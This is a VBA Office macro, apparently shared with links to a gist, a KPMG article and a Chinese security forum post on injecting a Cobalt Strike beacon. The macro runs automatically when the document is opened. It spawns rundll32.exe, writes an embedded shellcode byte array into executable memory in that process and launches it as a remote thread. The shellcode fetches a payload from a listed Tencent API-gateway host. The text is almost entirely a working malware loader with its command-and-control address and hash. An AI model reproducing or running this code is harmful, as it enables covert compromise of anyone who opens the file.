Private Type PROCESS_INFORMATION    hProcess As Long    hThread As Long    dwProcessId As Long    dwThreadId As LongEnd TypePrivate Type STARTUPINFO    cb As Long    lpReserved As String    lpDesktop As String    lpTitle As String    dwX As Long    dwY As Long    dwXSize As Long    dwYSize As Long    dwXCountChars As Long    dwYCountChars As Long    dwFillAttribute As Long    dwFlags As Long    wShowWindow As Integer    cbReserved2 As Integer    lpReserved2 As Long    hStdInput As Long    hStdOutput As Long    hStdError As LongEnd Type#If VBA7 Then    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#Else    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long#End IfSub Auto_Open()    Dim myByte As Long, myArray As Variant, offset As Long    Dim pInfo As PROCESS_INFORMATION    Dim sInfo As STARTUPINFO    Dim sNull As String    Dim sProc As String#If VBA7 Then    Dim rwxpage As LongPtr, res As LongPtr#Else    Dim rwxpage As Long, res As Long#End If    myArray = Array(-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, _13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, _-42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, _-117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, _-43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 80, 0, 0, 0, 83, 80, 104, 87, -119, -97, _-58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, _104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, _-43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, _-1, -1, 47, 118, 117, 101, 46, 109, 105, 110, 46, 106, 115, 0, 32, -92, 15, 47, 7, -86, -96, -85, -104, -78, 103, -107, -127, -113, 32, 125, 78, -13, 91, -97, -24, -116, 63, 56, -109, 52, _-74, 64, 65, -55, -73, 49, -43, -24, -99, -47, -104, 11, 12, -45, 79, 17, 35, 42, -127, -109, -8, -121, -10, 121, -47, -50, 104, 98, 59, -45, -81, -84, -10, 107, 103, -17, 67, -4, -6, 97, _47, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 77, 97, 99, 105, 110, 116, 111, 115, 104, 59, 32, 73, 110, _116, 101, 108, 32, 77, 97, 99, 32, 79, 83, 32, 88, 32, 49, 48, 46, 49, 53, 59, 32, 114, 118, 58, 56, 48, 46, 48, 41, 32, 71, 101, 99, 107, 111, 47, 50, 48, 49, 48, 48, _49, 48, 49, 32, 70, 105, 114, 101, 102, 111, 120, 47, 56, 48, 46, 48, 13, 10, 0, 85, 119, -3, -8, -107, 40, -123, -125, -4, -119, -39, 94, 117, -84, -37, -67, -88, -119, 45, -56, -85, _25, -83, -27, -32, 97, -31, -100, 57, 90, -66, -22, 23, -59, -108, -66, -89, 110, -55, 86, -91, -4, 115, 34, 71, -47, 72, 49, 20, 99, -119, 85, 14, -14, 71, 52, -73, -78, 64, -122, 20, _-117, 59, -88, -19, 19, -76, -12, 25, -29, 28, -37, 87, 20, -22, -82, -14, -24, -10, -5, -115, -72, 58, -33, 109, 0, -100, -87, 108, -62, 123, 31, 32, -94, 49, -119, 83, -92, -25, 71, 52, _-100, -39, 121, 28, 110, 5, -8, 31, -86, -51, 111, 74, 91, 96, -100, -15, -34, 90, 110, 43, -106, 54, 69, -89, 46, 121, -39, -16, -92, 76, -68, 13, -42, -86, 7, 45, 96, -72, 66, -51, _-119, 82, -103, -112, -58, 62, -37, -106, 109, -45, 7, 90, -18, 80, 20, 81, 31, -128, 47, 22, -45, -96, 0, -125, 10, 120, 110, 71, -76, 109, -40, -103, -96, 69, -126, -76, -76, -112, -87, -86, _-89, 100, -50, 20, 124, -36, 52, 118, -2, 44, 57, -124, 25, -64, -40, 2, -110, 15, -2, 28, 94, 125, -108, 117, -54, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, _104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, _-123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 115, 101, 114, 118, 105, 99, 101, 45, 112, 115, 49, 54, 119, 104, 118, 116, 45, 49, 51, 48, 52, _56, 48, 48, 50, 55, 49, 46, 115, 104, 46, 116, 101, 110, 99, 101, 110, 116, 97, 112, 105, 103, 119, 46, 99, 111, 109, 0, 73, -106, 2, -46)    If Len(Environ("ProgramW6432")) > 0 Then        sProc = Environ("windir") & "\SysWOW64\rundll32.exe"    Else        sProc = Environ("windir") & "\System32\rundll32.exe"    End If    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)    For offset = LBound(myArray) To UBound(myArray)        myByte = myArray(offset)        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)    Next offset    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)End SubSub AutoOpen()    Auto_OpenEnd SubSub Workbook_Open()    Auto_OpenEnd Sub

http://service-ps16whvt-1304800271.sh.tencentapigw.com

6ef475fdbe8052fe850923275247e5dafa08be83015bad755ccc421ae2ea73e8

https://gist.github.com/magnusstubman/18397dfd4fc6d22892cd4ee183747ef7https://kpmg.com/nl/en/home/insights/2022/05/injecting-a-cobalt-strike-beacon-from-an-office-macro-under-windows-defender.html原文链接：https://xz.aliyun.com/t/14234